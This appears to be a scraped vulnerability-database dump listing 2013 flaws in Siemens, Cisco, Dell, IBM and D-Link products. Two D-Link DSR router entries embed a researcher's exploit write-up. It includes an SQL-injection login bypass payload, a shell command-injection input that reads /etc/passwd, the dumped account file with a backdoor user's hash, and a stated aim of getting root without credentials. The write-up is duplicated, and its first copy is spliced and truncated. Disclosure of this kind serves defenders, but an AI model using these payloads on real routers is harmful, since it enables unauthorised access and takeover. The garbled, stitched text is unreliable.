php-intl-5.3.3-23.el6_4.1.x86_64.rpm
php-mbstring-5.3.3-23.el6_4.1.x86_64.rpm
php-process-5.3.3-23.el6_4.1.x86_64.rpm
php-pspell-5.3.3-23.el6_4.1.x86_64.rpm
php-recode-5.3.3-23.el6_4.1.x86_64.rpm
php-snmp-5.3.3-23.el6_4.1.x86_64.rpm
php-tidy-5.3.3-23.el6_4.1.x86_64.rpm
php-zts-5.3.3-23.el6_4.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2013-6420.html
https://access.redhat.com/security/updates/classification/#critical
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSqKLhXlSAg2UNWIIRAnSIAKCghJudv/nUjGlRyial77jiDvzgOACghRSP
XX2uwN0qecAwBgiL2cJNyh4=
=6m6W
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201312-0273 | CVE-2013-6925 | RuggedCom Rugged Operating System Session Hijacking Vulnerability |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 allows remote attackers to hijack web sessions by predicting a session id value. Supplementary information : CWE Vulnerability type by CWE-330: Use of Insufficiently Random Values ( Insufficient random value used ) Has been identified. RuggedCom Inc. is the world's leading manufacturer of high performance networking and communications equipment for industrial environments. The attacker must know the administrator client IP address to attack. RuggedCom Rugged Operating System is prone to a remote authentication-bypass and session-hijacking vulnerabilities.
Exploiting these issues can allow attackers to bypass authentication mechanism or hijack another user's session and gain unauthorized access to the victim's account on the affected device.
Versions prior to Rugged Operating System 3.12.2 are vulnerable. Siemens RuggedCom ROS is a set of operating system used in RuggedCom series switches by Siemens of Germany
| VAR-201312-0274 | CVE-2013-6926 | Siemens RuggedCom ROS Integrated HTTPS Vulnerability that bypasses administrator action restrictions on the server |
CVSS V2: 8.0 CVSS V3: - Severity: HIGH |
The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 allows remote authenticated users to bypass intended restrictions on administrative actions by leveraging access to a (1) guest or (2) operator account. RuggedCom Inc. is the world's leading manufacturer of high performance networking and communications equipment for industrial environments. The RuggedCom Rugged Operating System listens to TCP 443 port web servers for authentication bypass and hijacking session vulnerabilities, allowing remote non-privileged accounts (such as Guest or Operator) to perform some limited management operations over the network. RuggedCom Rugged Operating System is prone to a remote authentication-bypass and session-hijacking vulnerabilities.
Exploiting these issues can allow attackers to bypass authentication mechanism or hijack another user's session and gain unauthorized access to the victim's account on the affected device.
Versions prior to Rugged Operating System 3.12.2 are vulnerable. Siemens RuggedCom ROS is a set of operating system used in RuggedCom series switches by Siemens of Germany
| VAR-201312-0469 | CVE-2013-6840 | Siemens COMOS Vulnerable to gaining database privileges |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Siemens COMOS before 9.2.0.8.1, 10.0 before 10.0.3.1.40, and 10.1 before 10.1.0.0.2 allows local users to gain database privileges via unspecified vectors. Siemens COMOS is a factory management software developed by Siemens. The attacker needs to be able to access the system as a windows user and must be able to access the COMOS object. Siemens COMOS is prone to a local privilege-escalation vulnerability.
The following product versions are vulnerable:
COMOS versions prior to 9.2
COMOS 9.2.x versions prior to 9.2.0.8.1
COMOS 10.0.x versions prior to 10.0.3.1.40
COMOS 10.1.x versions prior to 10.1.0.0.2. The software enables the holistic design and management of plant and machinery assets throughout their lifecycle
| VAR-201312-0604 | No CVE | ZyXEL GS1510-16 webctrl.cgi verifies bypassing sensitive information to obtain vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ZyXEL GS1510-16 intelligent super fast Ethernet switch. ZyXEL GS1510-16 Web-Managed 16-Port Gigabit Ethernet Switch fails to properly restrict access to the webctrl.cgi script, allowing remote attackers to exploit the vulnerability to obtain administrator password information.
| VAR-201312-0455 | CVE-2013-6707 | Cisco Adaptive Security Appliance Service disruption in software connection manager implementation (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Memory leak in the connection-manager implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1(.3) and earlier allows remote attackers to cause a denial of service (multi-protocol management outage) by making multiple management session requests, aka Bug ID CSCug33233. Vendors have confirmed this vulnerability Bug CSCug33233 It is released as.A third party generates multiple management session requests, which disrupts service operation. ( Stop multi-protocol management ) There is a possibility of being put into a state. Cisco Adaptive Security Appliance (ASA) is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause an affected device to become unresponsive, resulting in a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCug33233
| VAR-201312-0335 | CVE-2013-7025 | plural Dell SonicWALL Product Alert Settings Section cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp. Multiple Dell SonicWALL Products are prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
The following products are vulnerable:
Dell SonicWALL Global Management System
Dell SonicWALL Analyzer
Dell SonicWALL Universal Managemnet Appliance E5000. Dell SonicWALL GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Dell SonicWALL Analyzer is a set of network analyzer software for SonicWALL infrastructure. A remote, authorized attacker could exploit this vulnerability to inject arbitrary web script or HTML by creating a specially crafted request
| VAR-201312-0171 | CVE-2013-5405 | IBM Sterling B2B Integrator and Sterling File Gateway Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network
| VAR-201312-0172 | CVE-2013-5406 | IBM Sterling B2B Integrator and Sterling File Gateway Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters, leading to improper interaction with the Windows MHTML protocol handler.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following product versions are vulnerable:
IBM Sterling B2B Integrator 5.2
IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML with specially crafted parameters
| VAR-201312-0173 | CVE-2013-5407 | IBM Sterling B2B Integrator and Sterling File Gateway Vulnerable to access restrictions |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not properly restrict use of FRAME elements, which allows remote authenticated users to bypass intended access restrictions or obtain sensitive information via a crafted web site, related to a "frame injection" issue. IBM Sterling B2B Integrator and IBM Sterling File Gateway are prone to an unspecified frame-injection vulnerability.
An attacker can exploit this issue to conduct phishing attacks. Successful exploits will allow the attacker to gain unauthorized access or obtain sensitive information.
The following product versions are vulnerable:
IBM Sterling B2B Integrator 5.2
IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. The vulnerability stems from the fact that the program does not properly restrict the use of FRAME elements
| VAR-201312-0174 | CVE-2013-5409 | IBM Sterling B2B Integrator and Sterling File Gateway In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands
| VAR-201312-0175 | CVE-2013-5411 | IBM Sterling B2B Integrator and Sterling File Gateway Link insertion vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote attackers to inject links and trigger unintended navigation or actions via unspecified vectors.
Attackers can exploit this issue to inject arbitrary links to different pages within the application. This may allow an attacker to perform phishing attacks by presenting false information that may appear to be legitimate application pages. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to inject links and trigger users to navigate to malicious websites or perform malicious actions
| VAR-201312-0176 | CVE-2013-5413 | IBM Sterling B2B Integrator and Sterling File Gateway Vulnerabilities that bypass authentication |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not invalidate a session upon a logout action, which allows remote attackers to bypass authentication by leveraging an unattended workstation.
Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to bypass authentication
| VAR-201312-0272 | CVE-2013-6920 | Siemens SINAMICS S/G Security Bypass Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Siemens SINAMICS S/G controllers with firmware before 4.6.11 do not require authentication for FTP and TELNET sessions, which allows remote attackers to bypass intended access restrictions via TCP traffic to port (1) 21 or (2) 23. Siemens SINAMICS S/G is a frequency converter developed by Siemens and is mainly used for mechanical engineering and plant construction. Siemens SINAMICS S/G are prone to a remote security bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and execute administrative commands without proper credentials.
Siemens SINAMICS S/G running firmware versions prior to 4.6.11 are vulnerable. The vulnerability stems from the fact that FTP and TELNET sessions do not perform authentication operations
| VAR-201312-0451 | CVE-2013-6702 | Cisco ONS 15454 Service disruption in the implementation of controller card software management (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users.
This issue is being tracked by Cisco bug IDs CSCtz50902 and CSCuh89020. Cisco ONS 15454 is a set of optical network multi-service transmission platform of American Cisco (Cisco). The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services to deliver next-generation voice, data services, and more. Controller Cards is one of the control cards
| VAR-201312-0198 | CVE-2013-5946 | plural D-Link Vulnerability to execute arbitrary commands in firmware of router products |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #
# CVEs:
# CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:
# D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:
# http://tsd.dlink.com.tw
#
# Arch:
# mips and armv6l, Linux
#
# Author:
# 0_o -- null_null
# nu11.nu11 [at] yahoo.com
#
# Date:
# 2013-08-18
#
# Purpose:
# Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:
# Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive as I assume
# more vulns are present that just slipped my attention.
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targetted
# by my previous exploit, as well as the triviality of those vulns I found
# makes me suggest that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#
0. Contents:
1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)
2. Exposure: D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure: Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow
1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)
* Possible via the global webUI login form.
* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
function login.authenticate(tablename, tableInput)
local username = tableInput["Users.UserName"]
local password = tableInput["Users.Password"]
local cur = db.execute(string.format([[
SELECT *, ROWID AS _ROWID_ FROM %s
WHERE %s = '%s' AND %s = '%s'
]], tablename, "UserName", username, "Password", password))
local result = false
local statusCode = "NONE"
if cur then
local row = cur:fetch({}, "a")
cur:close()
result = row ~= nil
if result == false then
statusCode = "USER_LOGIN_INVALID_PASSWORD"
end
end
return result, statusCode
end
* This function creates an SQL statement of the form:
SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
* Since there is a default admin user account called "admin" around, this is
easily exploitable by providing this to the login form:
username = admin
password = ' or 'a'='a
* ...resulting in this SQL statement:
SELECT *
FROM "Users"
WHERE "UserName" = 'admin'
AND "Password" = '' or 'a'='a';
* Old school SQL injection. Ohh, by the way...
* The same fault can be found in captivePortal.lua
-- FREE NETWORKS FOR EVERYONE --
2.
* File /pfrm2.0/var/www/systemCheck.htm contains:
local function runShellCmd(command)
local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
local cmdOutput = pipe:read("*a")
pipe:close()
return cmdOutput
end
if (ButtonType and ButtonType == "ping") then
[...]
local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
globalCmdOutput = runShellCmd (cmd_ping)
statusMessage = "Pinging " .. ipToPing
[...]
elseif (ButtonType and ButtonType == "traceroute") then
[...]
local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
globalCmdOutput = runShellCmd(cmd)
statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
[...]
elseif (ButtonType and ButtonType == "dnslookup") then
[...]
util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
statusMessage = "DNS Lookup for " .. Tools like curl are not hindered by these checks.
* All forms allow input like this:
localhost;<command>
example:
localhost;cat /etc/passwd
* This user provided value is then directly used as part of the input for the
call to runShellCmd(c) and thus io.popen(c) in the first form section and
os.execute(c) in the second form section.
* Output from user provided commands gets displayed on the next page beneath
the benign command output.
example:
[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]
3. Exposure: D-Link backdoor user:
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
* I verified this by showing the /etc/profile:
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
4. Vulnerability: Use of weak hash algorithms:
* In the /etc/shadow, salted DES hashes are used to store user passwords.
Since this hash type supports at most 8 characters, users can log in by just
typing the first 8 letters of their passwords when using SSH or telnet.
* An effective password length limitation of 8 characters makes brute force
attacks on user accounts very feasible, even if the user chose a longer
password.
5. Exposure: Passwords are stored as plain text in config files:
* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
/tmp/system.db is built on boot time, reveals that all user passwords are
stored in plain text.
Example:
[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]
6. Vulnerability: Bad permissions on /etc/shadow
* This file should have 600 permissions set and not 644. It is world readable.
Pointless, since every process runs as root, no user separation is
done anyway.
DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
| VAR-202002-0660 | CVE-2013-5945 | plural D-Link In the product SQL Injection vulnerabilities |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #
# CVEs:
# CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:
# D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:
# http://tsd.dlink.com.tw
#
# Arch:
# mips and armv6l, Linux
#
# Author:
# 0_o -- null_null
# nu11.nu11 [at] yahoo.com
#
# Date:
# 2013-08-18
#
# Purpose:
# Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:
# Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive as I assume
# more vulns are present that just slipped my attention.
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targetted
# by my previous exploit, as well as the triviality of those vulns I found
# makes me suggest that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#
0. Contents:
1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
(CVE-2013-5946)
3. Exposure: D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure: Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow
1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)
* Possible via the global webUI login form.
* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
function login.authenticate(tablename, tableInput)
local username = tableInput["Users.UserName"]
local password = tableInput["Users.Password"]
local cur = db.execute(string.format([[
SELECT *, ROWID AS _ROWID_ FROM %s
WHERE %s = '%s' AND %s = '%s'
]], tablename, "UserName", username, "Password", password))
local result = false
local statusCode = "NONE"
if cur then
local row = cur:fetch({}, "a")
cur:close()
result = row ~= nil
if result == false then
statusCode = "USER_LOGIN_INVALID_PASSWORD"
end
end
return result, statusCode
end
* This function creates an SQL statement of the form:
SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
* Since there is a default admin user account called "admin" around, this is
easily exploitable by providing this to the login form:
username = admin
password = ' or 'a'='a
* ...resulting in this SQL statement:
SELECT *
FROM "Users"
WHERE "UserName" = 'admin'
AND "Password" = '' or 'a'='a';
* Old school SQL injection. Ohh, by the way...
* The same fault can be found in captivePortal.lua
-- FREE NETWORKS FOR EVERYONE --
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
(CVE-2013-5946)
* Possible from the Tools --> System Check page.
* File /pfrm2.0/var/www/systemCheck.htm contains:
local function runShellCmd(command)
local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
local cmdOutput = pipe:read("*a")
pipe:close()
return cmdOutput
end
if (ButtonType and ButtonType == "ping") then
[...]
local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
globalCmdOutput = runShellCmd (cmd_ping)
statusMessage = "Pinging " .. ipToPing
[...]
elseif (ButtonType and ButtonType == "traceroute") then
[...]
local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
globalCmdOutput = runShellCmd(cmd)
statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
[...]
elseif (ButtonType and ButtonType == "dnslookup") then
[...]
util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
statusMessage = "DNS Lookup for " .. internetNameToNsLookup
[...]
* Command injection is possible in at least these form sections:
Ping or Trace an IP Address
Perform a DNS Lookup
* When using a browser, deactivate the "onclick" JavaScript checks using
a tool like Firebug. Tools like curl are not hindered by these checks.
* All forms allow input like this:
localhost;<command>
example:
localhost;cat /etc/passwd
* This user provided value is then directly used as part of the input for the
call to runShellCmd(c) and thus io.popen(c) in the first form section and
os.execute(c) in the second form section.
* Output from user provided commands gets displayed on the next page beneath
the benign command output.
example:
[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]
3. Exposure: D-Link backdoor user:
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
